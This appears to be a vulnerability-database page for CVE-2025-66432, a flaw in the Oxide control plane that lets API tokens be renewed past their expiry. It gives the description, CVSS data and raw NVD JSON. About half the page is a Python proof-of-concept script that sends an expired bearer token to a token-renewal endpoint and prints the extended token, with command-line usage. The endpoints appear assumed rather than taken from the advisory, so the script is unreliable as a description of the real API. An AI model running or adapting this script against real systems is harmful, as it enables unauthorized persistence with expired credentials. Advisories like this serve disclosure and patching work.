Security Vulnerability Report
中文
CVE-2025-66432 CVSS 5.0 MEDIUM

CVE-2025-66432

Published: 2025-11-30 05:16:08
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In Oxide control plane 15 through 17 before 17.1, API tokens can be renewed past their expiration date.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Oxide control plane 15
Oxide control plane 16
Oxide control plane 17
Oxide control plane < 17.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-66432 - Oxide Control Plane API Token Renewal Bypass This PoC demonstrates the vulnerability where expired API tokens can be renewed. Note: This is for educational and authorized testing purposes only. """ import requests import json import argparse from datetime import datetime, timedelta def renew_expired_token(api_url, token, verify_ssl=True): """ Attempt to renew an expired API token. Args: api_url: Base URL of the Oxide Control Plane API token: The expired or expiring API token verify_ssl: Whether to verify SSL certificates Returns: Response from the API """ headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } # Token renewal endpoint renew_endpoint = f"{api_url}/api/v1/tokens/renew" payload = { 'token': token, 'extend_expiration': True } try: print(f"[*] Attempting to renew token: {token[:20]}...") response = requests.post( renew_endpoint, headers=headers, json=payload, verify=verify_ssl, timeout=30 ) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: data = response.json() new_token = data.get('token', '') new_expiry = data.get('expires_at', 'Unknown') print(f"[+] SUCCESS: Token renewed successfully!") print(f"[+] New Token: {new_token[:40]}...") print(f"[+] New Expiry: {new_expiry}") return { 'success': True, 'new_token': new_token, 'expires_at': new_expiry } else: print(f"[-] Failed to renew token") print(f"[-] Response: {response.text}") return {'success': False, 'error': response.text} except requests.exceptions.RequestException as e: print(f"[-] Request failed: {str(e)}") return {'success': False, 'error': str(e)} def check_token_status(api_url, token, verify_ssl=True): """ Check the current status of an API token. Args: api_url: Base URL of the Oxide Control Plane API token: The API token to check verify_ssl: Whether to verify SSL certificates Returns: Token status information """ headers = { 'Authorization': f'Bearer {token}' } status_endpoint = f"{api_url}/api/v1/tokens/status" try: print(f"[*] Checking token status...") response = requests.get( status_endpoint, headers=headers, verify=verify_ssl, timeout=30 ) if response.status_code == 200: return response.json() else: return {'valid': False, 'error': response.text} except requests.exceptions.RequestException as e: return {'valid': False, 'error': str(e)} def main(): parser = argparse.ArgumentParser( description='CVE-2025-66432 PoC - Oxide Control Plane Token Renewal Bypass' ) parser.add_argument('-u', '--url', required=True, help='Oxide Control Plane API URL') parser.add_argument('-t', '--token', required=True, help='API token to renew') parser.add_argument('--check-only', action='store_true', help='Only check token status without renewing') parser.add_argument('--no-verify', action='store_true', help='Skip SSL certificate verification') args = parser.parse_args() verify_ssl = not args.no_verify print("=" * 60) print("CVE-2025-66432 PoC - Oxide Control Plane") print("API Token Renewal Past Expiration Date") print("=" * 60) if args.check_only: status = check_token_status(args.url, args.token, verify_ssl) print(f"[*] Token Status: {json.dumps(status, indent=2)}") else: result = renew_expired_token(args.url, args.token, verify_ssl) print(f"\n[*] Result: {json.dumps(result, indent=2)}") if __name__ == '__main__': main() # Usage: # python cve-2025-66432.py -u https://oxide-server/api -t <expired-token> --check-only # python cve-2025-66432.py -u https://oxide-server/api -t <expired-token>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66432", "sourceIdentifier": "[email protected]", "published": "2025-11-30T05:16:08.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Oxide control plane 15 through 17 before 17.1, API tokens can be renewed past their expiration date."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-420"}]}], "references": [{"url": "https://docs.oxide.computer/security/advisories/20251117-1", "source": "[email protected]"}, {"url": "https://github.com/oxidecomputer/omicron/compare/01bb875...ec069f0", "source": "[email protected]"}, {"url": "https://oxide.computer/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.